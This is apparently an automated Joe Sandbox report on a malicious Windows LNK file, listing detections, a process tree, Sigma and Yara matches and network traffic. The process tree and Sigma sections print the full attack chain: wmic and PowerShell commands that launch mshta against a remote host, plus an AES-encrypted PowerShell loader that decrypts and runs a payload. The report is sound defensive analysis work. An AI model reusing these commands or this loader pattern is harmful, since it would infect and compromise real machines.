Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GYede3Gwn0.lnk

Overview

General Information

Sample name:GYede3Gwn0.lnk
renamed because original name is a hash value
Original sample name:560d5d5e43b6d2ac1bdfb3ca4156e6d7.lnk
Analysis ID:1582715
MD5:560d5d5e43b6d2ac1bdfb3ca4156e6d7
SHA1:51ac4281c6bab97eed94a529d901cd29cc15f36d
SHA256:98a28a0d4d028d446811b620e519d258feb8dc4c494705f372ae0c7c22fa9804
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 592 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3560 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 4372 cmdline: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 6892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 2012 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 7248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7436 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]emmenhtal_strings_hta_exeEmmenhtal Loader stringSekoia.io
  • 0x3f1df:$char: = String.fromCharCode(ac,yU,
  • 0x3f1d8:$var: var
  • 0x5bcae:$eval: eval(
  • 0x3f04f:$script1: <script>
  • 0x5bca4:$script1: <script>
  • 0x46c9b:$script2: </script>MZ
  • 0x5bcca:$script2: </script>MZ

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc, CommandLine: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc, ProcessId: 4372, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", ProcessId: 592, ProcessName: WMIC.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 592, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc'), ProcessId: 3560, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3544, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-31T10:38:08.665503+010028033053Unknown Traffic192.168.2.64974392.113.18.193443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://vividpulse.pro/Seed/HavocAvira URL Cloud: Label: malware
Source: https://vividpulse.pro/Seed/Havoc...Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: GYede3Gwn0.lnkReversingLabs: Detection: 18%
Source: GYede3Gwn0.lnkVirustotal: Detection: 25%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506065317.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487288240.0000025067FDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488031202.0000025067FB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2492202557.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486345717.000002506C091000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr
Source: global trafficHTTP traffic detected: GET /Fox/API%20_Guide.pdf HTTP/1.1Host: vividpulse.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Quantum/XZJKPUBX.msi HTTP/1.1Host: vividpulse.pro
Source: Joe Sandbox ViewASN Name: UKRTELNETUA UKRTELNETUA
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49743 -> 92.113.18.193:443
Source: global trafficHTTP traffic detected: GET /Seed/Havoc HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vividpulse.proConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Seed/Havoc HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vividpulse.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Fox/API%20_Guide.pdf HTTP/1.1Host: vividpulse.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Quantum/XZJKPUBX.msi HTTP/1.1Host: vividpulse.pro
Source: global trafficDNS traffic detected: DNS query: vividpulse.pro
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506242592.00000248653CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508548791.00000248653CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: svchost.exe, 00000008.00000002.3418085675.000001549CA85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.12.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD929D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
